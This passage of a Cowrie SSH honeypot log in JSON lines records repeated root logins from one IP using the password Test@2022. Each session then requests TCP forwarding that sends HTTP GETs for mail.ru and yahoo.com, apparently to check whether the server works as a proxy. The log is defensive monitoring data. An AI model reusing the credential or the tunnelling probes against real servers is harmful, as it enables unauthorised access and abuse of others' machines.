p521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:12.294899Z","src_ip":"77.83.207.83","session":"fb637fb57b5a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:12.546512Z","src_ip":"77.83.207.83","session":"fb637fb57b5a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":6004,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:6004","sensor":"my-vps","timestamp":"2025-08-31T03:52:12.597808Z","session":"fb637fb57b5a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:12.648168Z","src_ip":"77.83.207.83","session":"fb637fb57b5a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":10923,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:10923","sensor":"my-vps","timestamp":"2025-08-31T03:52:12.788822Z","session":"fb637fb57b5a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:12.840020Z","src_ip":"77.83.207.83","session":"fb637fb57b5a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":1352,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:1352","sensor":"my-vps","timestamp":"2025-08-31T03:52:12.984840Z","session":"fb637fb57b5a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:13.035249Z","src_ip":"77.83.207.83","session":"fb637fb57b5a"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:13.086292Z","src_ip":"77.83.207.83","session":"fb637fb57b5a"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":29493,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5a168ad2fd3","protocol":"ssh","message":"New connection: 77.83.207.83:29493 (1.2.3.4:22) [session: a5a168ad2fd3]","sensor":"my-vps","timestamp":"2025-08-31T03:52:13.134951Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:13.144796Z","src_ip":"77.83.207.83","session":"a5a168ad2fd3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:13.185098Z","src_ip":"77.83.207.83","session":"a5a168ad2fd3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:13.434050Z","src_ip":"77.83.207.83","session":"a5a168ad2fd3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":9275,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:9275","sensor":"my-vps","timestamp":"2025-08-31T03:52:13.484850Z","session":"a5a168ad2fd3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:13.534764Z","src_ip":"77.83.207.83","session":"a5a168ad2fd3"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:13.566249Z","src_ip":"212.227.235.229","session":"97bc1f783e88"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":7724,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:7724","sensor":"my-vps","timestamp":"2025-08-31T03:52:13.676232Z","session":"a5a168ad2fd3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:13.726207Z","src_ip":"77.83.207.83","session":"a5a168ad2fd3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":8923,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:8923","sensor":"my-vps","timestamp":"2025-08-31T03:52:13.868257Z","session":"a5a168ad2fd3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:13.918310Z","src_ip":"77.83.207.83","session":"a5a168ad2fd3"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:13.969240Z","src_ip":"77.83.207.83","session":"a5a168ad2fd3"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":29629,"dst_ip":"1.2.3.4","dst_port":22,"session":"2037e8bcc65e","protocol":"ssh","message":"New connection: 77.83.207.83:29629 (1.2.3.4:22) [session: 2037e8bcc65e]","sensor":"my-vps","timestamp":"2025-08-31T03:52:14.017857Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:14.018860Z","src_ip":"77.83.207.83","session":"2037e8bcc65e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:14.068701Z","src_ip":"77.83.207.83","session":"2037e8bcc65e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:14.316438Z","src_ip":"77.83.207.83","session":"2037e8bcc65e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":644,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:644","sensor":"my-vps","timestamp":"2025-08-31T03:52:14.366931Z","session":"2037e8bcc65e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:14.416560Z","src_ip":"77.83.207.83","session":"2037e8bcc65e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":25923,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:25923","sensor":"my-vps","timestamp":"2025-08-31T03:52:14.555929Z","session":"2037e8bcc65e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:14.605484Z","src_ip":"77.83.207.83","session":"2037e8bcc65e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":23251,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:23251","sensor":"my-vps","timestamp":"2025-08-31T03:52:14.747970Z","session":"2037e8bcc65e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:14.797480Z","src_ip":"77.83.207.83","session":"2037e8bcc65e"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:14.847659Z","src_ip":"77.83.207.83","session":"2037e8bcc65e"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":29740,"dst_ip":"1.2.3.4","dst_port":22,"session":"121d17cdaaed","protocol":"ssh","message":"New connection: 77.83.207.83:29740 (1.2.3.4:22) [session: 121d17cdaaed]","sensor":"my-vps","timestamp":"2025-08-31T03:52:14.897241Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:14.907659Z","src_ip":"77.83.207.83","session":"121d17cdaaed"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:14.947636Z","src_ip":"77.83.207.83","session":"121d17cdaaed"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:15.196827Z","src_ip":"77.83.207.83","session":"121d17cdaaed"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":27941,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:27941","sensor":"my-vps","timestamp":"2025-08-31T03:52:15.247653Z","session":"121d17cdaaed"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:15.297936Z","src_ip":"77.83.207.83","session":"121d17cdaaed"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":29837,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:29837","sensor":"my-vps","timestamp":"2025-08-31T03:52:15.440337Z","session":"121d17cdaaed"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:15.490486Z","src_ip":"77.83.207.83","session":"121d17cdaaed"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":8871,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:8871","sensor":"my-vps","timestamp":"2025-08-31T03:52:15.632924Z","session":"121d17cdaaed"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:15.683151Z","src_ip":"77.83.207.83","session":"121d17cdaaed"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:15.733912Z","src_ip":"77.83.207.83","session":"121d17cdaaed"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":29830,"dst_ip":"1.2.3.4","dst_port":22,"session":"ceabf9f2b58e","protocol":"ssh","message":"New connection: 77.83.207.83:29830 (1.2.3.4:22) [session: ceabf9f2b58e]","sensor":"my-vps","timestamp":"2025-08-31T03:52:15.786163Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:15.796376Z","src_ip":"77.83.207.83","session":"ceabf9f2b58e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:15.839916Z","src_ip":"77.83.207.83","session":"ceabf9f2b58e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:16.105984Z","src_ip":"77.83.207.83","session":"ceabf9f2b58e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":8486,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:8486","sensor":"my-vps","timestamp":"2025-08-31T03:52:16.160175Z","session":"ceabf9f2b58e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:16.213605Z","src_ip":"77.83.207.83","session":"ceabf9f2b58e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":19479,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:19479","sensor":"my-vps","timestamp":"2025-08-31T03:52:16.363800Z","session":"ceabf9f2b58e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:16.417211Z","src_ip":"77.83.207.83","session":"ceabf9f2b58e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":2927,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:2927","sensor":"my-vps","timestamp":"2025-08-31T03:52:16.567876Z","session":"ceabf9f2b58e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:16.621461Z","src_ip":"77.83.207.83","session":"ceabf9f2b58e"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:16.675675Z","src_ip":"77.83.207.83","session":"ceabf9f2b58e"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":29936,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9d3b458f2f4","protocol":"ssh","message":"New connection: 77.83.207.83:29936 (1.2.3.4:22) [session: b9d3b458f2f4]","sensor":"my-vps","timestamp":"2025-08-31T03:52:16.726185Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:16.726917Z","src_ip":"77.83.207.83","session":"b9d3b458f2f4"}
